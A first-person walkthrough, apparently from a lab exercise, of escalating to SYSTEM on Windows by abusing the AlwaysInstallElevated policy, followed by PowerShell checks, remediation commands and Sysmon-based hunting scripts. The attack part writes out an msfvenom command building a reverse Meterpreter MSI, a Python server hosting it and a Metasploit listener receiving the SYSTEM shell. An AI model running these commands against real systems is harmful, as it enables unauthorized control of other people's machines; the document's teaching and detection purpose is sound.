
🧠 Summary

In this walkthrough, I exploited the AlwaysInstallElevated privilege escalation technique on a vulnerable Windows machine. When the AlwaysInstallElevated value is set to 1 under both HKLM and HKCU, the Windows Installer service installs any .msi package launched by a standard user with NT AUTHORITY\SYSTEM privileges, so whatever the package runs (including a custom action that launches a payload) runs as SYSTEM. Below is a step-by-step breakdown of how I leveraged this misconfiguration to gain SYSTEM access.


🔍 Step 1: Confirming Registry Vulnerability

After gaining initial access to the target machine, I checked the registry for AlwaysInstallElevated values:

reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
[Screenshot: registry keys confirming AlwaysInstallElevated is enabled]

Both were set to 0x1, confirming the system is vulnerable. The policy only takes effect when both values are 1: if either value is missing (reg query reports the key or value as not found) or set to 0, Windows Installer will not elevate. Note that the HKCU value is per-user, so the check has to be run as the user who will launch the installer.
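As an added check (not part of the original walkthrough), the following PowerShell function evaluates the setting the way Windows Installer does: it reads both hives, treats a missing key or value as 0, and only reports the host as vulnerable when both values are 1. Running it from the session you already have lands on the same answer as the two reg query commands above, but without the "unable to find the specified registry key" noise when a value is absent.

```powershell
# Added example (not from the original post): evaluate AlwaysInstallElevated like the
# Windows Installer service does. Both HKLM and HKCU must hold REG_DWORD 1; a missing
# key or value is equivalent to 0. HKCU is read for the current user only.
function Get-AlwaysInstallElevatedValue {
    param([Parameter(Mandatory)][ValidateSet('HKLM', 'HKCU')][string]$Hive)
    $path = "${Hive}:\Software\Policies\Microsoft\Windows\Installer"
    # Get-ItemProperty returns $null (no exception) when the key or the value is absent
    $item = Get-ItemProperty -Path $path -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
    if ($null -eq $item) { return 0 }   # policy not configured in this hive
    return [int]$item.AlwaysInstallElevated
}

function Test-AlwaysInstallElevated {
    $hklm = Get-AlwaysInstallElevatedValue -Hive 'HKLM'
    $hkcu = Get-AlwaysInstallElevatedValue -Hive 'HKCU'
    [pscustomobject]@{
        User       = "$env:USERDOMAIN\$env:USERNAME"   # re-run as the user who will launch the MSI
        HKLM       = $hklm
        HKCU       = $hkcu
        # Only the combination elevates; one hive alone is not exploitable
        Vulnerable = ($hklm -eq 1 -and $hkcu -eq 1)
    }
}

Test-AlwaysInstallElevated | Format-List
```

If the function reports HKLM = 1 but HKCU = 0 for your current user, the machine-wide policy is on but this account has not been configured; it may still be worth checking other users' hives (HKU\<SID>) before writing the host off.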


💣 Step 2: Creating a Malicious MSI Payload

On my Kali attack box, I generated a reverse Meterpreter payload in MSI format using msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.2.119.123 -f msi -o setup.msi

[Screenshot: msfvenom command generating the setup.msi payload]

Since no LPORT is specified, msfvenom uses its default of 4444; the handler in Step 5 has to listen on the same port, and its default LPORT is also 4444. The -f msi format wraps the payload in an installer package that launches it during installation, which is what lets AlwaysInstallElevated carry it to SYSTEM.

🌐 Step 3: Hosting the Payload

I used Python to host the .msi file over HTTP:

python3 -m http.server 80
[Screenshot: HTTP server log showing the victim downloading setup.msi]

📥 Step 4: Downloading and Executing on Victim Machine

On the victim machine, I opened Internet Explorer and navigated to the Kali host IP to download the payload. Downloading alone does nothing; the escalation happens when the package is installed, so the MSI is only run after the listener in Step 5 is up.

[Screenshot: setup.msi download prompt in Internet Explorer]

🧠 Step 5: Listener Setup and Shell Access

On my Kali box, I launched a Metasploit listener to catch the reverse shell (the handler must already be listening when the MSI is run, otherwise the payload's connection is refused and the installer simply fails):

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.2.119.123
run
[Screenshot: Meterpreter session opened as SYSTEM after the MSI ran]

Once the MSI was executed on the victim, the payload ran with SYSTEM privileges, as confirmed by getuid returning NT AUTHORITY\SYSTEM. The Windows Installer service performs the install, so the process tree on the host shows the payload as a child of msiexec.exe running as SYSTEM, which is also the footprint defenders should look for.


🛡️ Mitigation

To prevent this type of privilege escalation:

  • Set AlwaysInstallElevated to 0 (or delete the value) in both HKLM and HKCU. On domain-joined hosts do this through Group Policy ("Always install with elevated privileges" under Windows Components > Windows Installer, in both Computer Configuration and User Configuration), because a policy-managed value is re-applied on every policy refresh and a manual registry change would be reverted:
    reg add HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 0 /f
    reg add HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 0 /f
    
  • Restrict which .msi packages standard users can run, for example with AppLocker or WDAC Windows Installer rules that only allow signed or approved packages
  • Use endpoint monitoring to alert on child processes of msiexec.exe running as SYSTEM and on Windows Installer transactions (MsiInstaller events in the Application log) that install packages from user-writable locations such as Downloads or Temp
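The mitigation list above can be turned into a remediation-plus-hunt script. The following PowerShell is an added example, not from the original post. The remediation half writes 0 to both hives (for HKCU, the current user only); the hunting half assumes Sysmon is installed with process-creation logging (Event ID 1) and reads the standard MsiInstaller 1040 "Beginning a Windows Installer transaction" events from the Application log, which record the package path and the client process that requested the install.

```powershell
# Added example (not from the original post). Assumes: Sysmon with Event ID 1 enabled,
# and that the host writes the standard MsiInstaller events to the Application log.

# 1. Remediation: 0 and "value absent" are equivalent for Windows Installer. Where a
#    GPO manages this setting, fix the GPO instead, or the value comes back on refresh.
function Disable-AlwaysInstallElevated {
    foreach ($hive in 'HKLM', 'HKCU') {
        $path = "${hive}:\Software\Policies\Microsoft\Windows\Installer"
        if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
        New-ItemProperty -Path $path -Name AlwaysInstallElevated -PropertyType DWord -Value 0 -Force | Out-Null
    }
}

# Flatten a Sysmon event's EventData into a hashtable keyed by field name
function ConvertFrom-SysmonEvent {
    param([Parameter(Mandatory)]$Event)
    $xml = [xml]$Event.ToXml()
    $data = @{}
    foreach ($node in $xml.Event.EventData.Data) { $data[$node.Name] = $node.'#text' }
    $data['TimeCreated'] = $Event.TimeCreated
    $data
}

# 2a. Hunt: processes spawned by msiexec.exe as SYSTEM. Legitimate installers also run
#     custom actions here, so baseline by Image/CommandLine; a payload dropped in a
#     user's Downloads or Temp folder and launched by msiexec as SYSTEM is the signal.
function Find-MsiexecSystemChildren {
    param([int]$Hours = 24)
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object { ConvertFrom-SysmonEvent -Event $_ } |
        Where-Object { $_['ParentImage'] -like '*\msiexec.exe' -and $_['User'] -eq 'NT AUTHORITY\SYSTEM' } |
        ForEach-Object {
            [pscustomobject]@{
                Time        = $_['TimeCreated']
                Image       = $_['Image']
                CommandLine = $_['CommandLine']
                ParentUser  = $_['ParentUser']   # who launched the install (blank on older Sysmon versions)
            }
        }
}

# 2b. Hunt: Windows Installer transactions for packages outside trusted install paths.
#     Event 1040's message names the .msi path and the client process id.
function Find-SuspiciousMsiTransactions {
    param([int]$Hours = 24)
    $filter = @{ LogName = 'Application'; ProviderName = 'MsiInstaller'; Id = 1040; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match '\\Users\\[^\\]+\\(Downloads|AppData\\Local\\Temp)\\' } |
        Select-Object TimeCreated, Message
}

Disable-AlwaysInstallElevated
Find-MsiexecSystemChildren -Hours 24 | Format-Table -AutoSize
Find-SuspiciousMsiTransactions -Hours 24 | Format-List
```

Run the hunt functions from an elevated prompt (reading the Sysmon log requires it). The path regex in Find-SuspiciousMsiTransactions is a starting point; extend it to whatever user-writable locations your environment allows packages to land in, and treat any hit that is not a known software deployment as worth pulling the corresponding Sysmon process tree for.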

🔗 MITRE ATT&CK Mapping

  • T1548 – Abuse Elevation Control Mechanism. The sub-technique T1548.002 (Bypass User Account Control) is often cited for this, but no UAC prompt is bypassed here; the elevation comes from the Windows Installer service honouring the AlwaysInstallElevated policy, so the parent technique is the closer fit
  • T1218.007 – System Binary Proxy Execution: Msiexec, for executing the payload through msiexec.exe

Success: I escalated from user to SYSTEM by abusing AlwaysInstallElevated and a malicious MSI payload. Always validate registry settings during post-exploitation recon!

Stay sharp, and happy hacking! 🛠️